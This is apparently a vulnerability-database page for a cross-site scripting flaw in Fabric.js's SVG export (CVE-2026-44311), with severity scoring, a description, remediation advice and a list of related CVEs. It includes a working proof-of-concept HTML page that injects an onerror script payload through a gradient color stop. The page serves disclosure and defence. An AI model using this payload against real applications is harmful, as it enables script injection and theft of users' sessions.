Fabric.js CVE-2026-44311
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Network-reachable with no attacker auth required, but victim must render SVG via innerHTML (UI:R); limited C/I reflects XSS session-theft scope with no availability impact.
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
3Blast Radius
ecosystem impact- 48 npm packages depend on fabric (40 direct, 10 indirect)
Ecosystem-wide dependent count for version 7.4.0.
DescriptionNVD
Summary
A potential Cross-Site Scripting (XSS) vulnerability exists in Fabric.js due to improper escaping of user-controlled input during SVG serialization via the toSVG() method.
Specifically, the color field within the colorStops array of a fabric.Gradient object is not properly escaped when converted into SVG <stop> elements. If an application renders the generated SVG string into the DOM (e.g., via innerHTML), this may allow an attacker to inject arbitrary HTML/SVG and execute JavaScript in the victim's browser.
Details
During SVG export, Fabric.js serializes gradient color stops into <stop> elements like:
<stop offset="0" stop-color="..."></stop>However, the color value is inserted into the stop-color attribute without proper escaping of special characters such as ", <, and >. This allows crafted input to break out of the attribute context and inject arbitrary markup.
For example:
color: 'red"><img src="x" onerror="alert(1)">'may result in:
<stop offset="0" stop-color="red">
<img src="x" onerror="alert(1)">This breaks the intended SVG structure and introduces executable HTML.
PoC (Proof of Concept)
Successfully verified on v7.2.0 (current latest version). The following HTML and JavaScript code reproduces the vulnerability. The code constructs a rectangle with a maliciously crafted gradient color stop and exports it to SVG:
<!DOCTYPE html>
<html>
<head>
<title>Fabric.js SVG Export XSS Bypass Test</title>
<script src="[https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js](https://cdn.jsdelivr.net/npm/fabric@7.2.0/dist/index.js)"></script>
</head>
<body>
<h1>Fabric.js SVG Export XSS Bypass Test (Gradient Color)</h1>
<canvas id="c" width="400" height="300"></canvas>
<h3>SVG Output Rendering:</h3>
<div id="svg-output" style="border: 1px solid #ccc; padding: 10px; margin-top: 10px;"></div>
<script>
setTimeout(() => {
const canvas = new fabric.Canvas('c');
// Construct a malicious gradient object
const maliciousGradient = new fabric.Gradient({
type: 'linear',
coords: { x1: 0, y1: 0, x2: 100, y2: 0 },
colorStops: [
{
offset: 0,
// Inject XSS payload to prematurely close the attribute/tag
color: 'red"><img src="x" onerror="alert(\'XSS Triggered Successfully!\')">'
},
{ offset: 1, color: 'blue' }
]
});
const rect = new fabric.Rect({
left: 50, top: 50, width: 300, height: 100,
fill: maliciousGradient
});
canvas.add(rect);
// Export to SVG string containing the malicious code
const svgOutput = canvas.toSVG();
// Render on the page to trigger the XSS
document.getElementById('svg-output').innerHTML = svgOutput;
}, 100);
</script>
</body>
</html>Impact
This issue can lead to XSS in applications that:
- Allow user-controlled input in gradient definitions (e.g., color values)
- Use
canvas.toSVG()to export content - Insert the resulting SVG string into the DOM without sanitization (e.g., via
innerHTML)
Successful exploitation may result in the execution of arbitrary JavaScript in the victim's browser, theft of sensitive data, or unauthorized actions on behalf of the user.
Suggested Fix
Proper Escaping (Recommended): Escape special characters in attribute values during SVG serialization.
AnalysisAI
Cross-site scripting in Fabric.js (npm: fabric) versions prior to 7.4.0 is triggered when applications export canvas content via canvas.toSVG() and render the result into the DOM using innerHTML. The color field within colorStops of a fabric.Gradient object is inserted into SVG <stop> elements without escaping ", <, or >, allowing crafted input to break attribute context and inject arbitrary HTML. A working proof-of-concept is publicly confirmed against v7.2.0; no active exploitation appears in CISA KEV, and the EPSS score of 0.04% reflects low observed exploitation breadth consistent with the chained conditions required.
Technical ContextAI
Fabric.js is a JavaScript HTML5 canvas library distributed as the fabric npm package (pkg:npm/fabric). Its SVG serialization subsystem converts canvas objects into SVG markup via canvas.toSVG(), generating <stop> elements for fabric.Gradient instances. The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation): the color property of each colorStops entry is interpolated directly into the stop-color attribute string without HTML/attribute-context escaping of special characters (", <, >). This allows an attacker-controlled string such as red"><img src="x" onerror="alert(1)"> to close the attribute and containing element, injecting arbitrary markup into the serialized SVG. The injected code only executes when the consuming application writes this SVG string into the live DOM - for example, via element.innerHTML = canvas.toSVG() - rather than using a safe rendering path such as a Blob URL with an <img> tag.
RemediationAI
Vendor-released patch: 7.4.0. Upgrade the fabric npm package to v7.4.0 or later by running npm install fabric@7.4.0 (or the equivalent for yarn/pnpm); the fix is confirmed in the official release notes at https://github.com/fabricjs/fabric.js/releases/tag/v740, which explicitly cites CVE-2026-44311. For applications that cannot immediately upgrade, the most effective compensating control is to sanitize the SVG output before DOM injection using DOMPurify (DOMPurify.sanitize(canvas.toSVG()) before assigning to innerHTML), which neutralizes injected event-handler payloads without requiring a library upgrade. An alternative safe-rendering path is to avoid innerHTML entirely by rendering the SVG via URL.createObjectURL(new Blob([svgOutput], {type: 'image/svg+xml'})) and setting that as the src of an <img> element - this prevents script execution regardless of SVG content. Relying solely on Content Security Policy is not recommended as a primary mitigation because misconfigured or legacy CSP headers permitting unsafe-inline or broad script sources may not block injected onerror-style handlers.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-w22m-hvvm-xmwx